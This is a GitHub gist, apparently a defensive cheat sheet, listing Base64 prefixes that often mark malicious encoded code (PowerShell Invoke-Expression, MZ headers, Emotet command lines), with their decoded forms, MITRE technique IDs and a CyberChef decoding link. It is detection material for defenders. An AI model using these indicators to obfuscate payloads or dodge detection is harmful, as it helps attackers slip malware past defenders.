Skip to content

Instantly share code, notes, and snippets.

@ashr

ashr/Base64_CheatSheet.md

Forked from Neo23x0/Base64_CheatSheet.md
Created October 24, 2019 21:31
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ashr/0f78cf527726f8c9b05211d624da59b3 to your computer and use it in GitHub Desktop.
Save ashr/0f78cf527726f8c9b05211d624da59b3 to your computer and use it in GitHub Desktop.
Download ZIP
Spot Malicious Base64 Encoded Code
Raw
Base64_CheatSheet.md

Learning Aid - Top Base64 Encodings Table

MITRE ATT4CK - T1132 - Data Encoding

Base64 Code Decoded (. = 0x00) Description MITRE ID
JAB $. Variable declaration (UTF-16) T1086
TVq MZ MZ header T1001
UEs PK ZIP, Office documents T1001
SUVY IEX PowerShell Invoke Expression T1086
SQBFAF I.E. PowerShell Invoke Expression (UTF-16) T1086
PAA <. Often used in Emotet command lines (UTF-16) T1086
cwBhA s.a. Often used in malicious droppers (UTF-16) 'sal' instead of 'var' T1086
aWV4 iex PowerShell Invoke Expression T1086
aQBlA i.e. PowerShell Invoke Expression (UTF-16) T1086
R2V0 Get Often used to obfuscate imports like GetCurrentThreadId T1001
dmFy var Variable declaration T1064
dgBhA v.a. Variable declaration (UTF-16) T1064
dXNpbm usin Often found in compile after delivery attacks T1500

Cyber Chef Recipe

https://gchq.github.io/CyberChef/#recipe=Fork('%5C%5Cn','%5C%5Cn',false)From_Base64('A-Za-z0-9%2B/%3D',true)&input=SkFCClRWcQpQQUEKU1VWWQpTUUJGQUYKYVdWNAphUUJsQQpSMlYwCmRtRnkKZGdCaEEKY3dCaEEKZFhOcGJt

References

Tweet

Tweet and Thread https://twitter.com/cyb3rops/status/1187341941794660354

cwBha

https://www.hybrid-analysis.com/sample/b744129bfe54de8b36d7556ddfcc55d0be213129041aacf52b7d2f57012caa60?environmentId=100

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment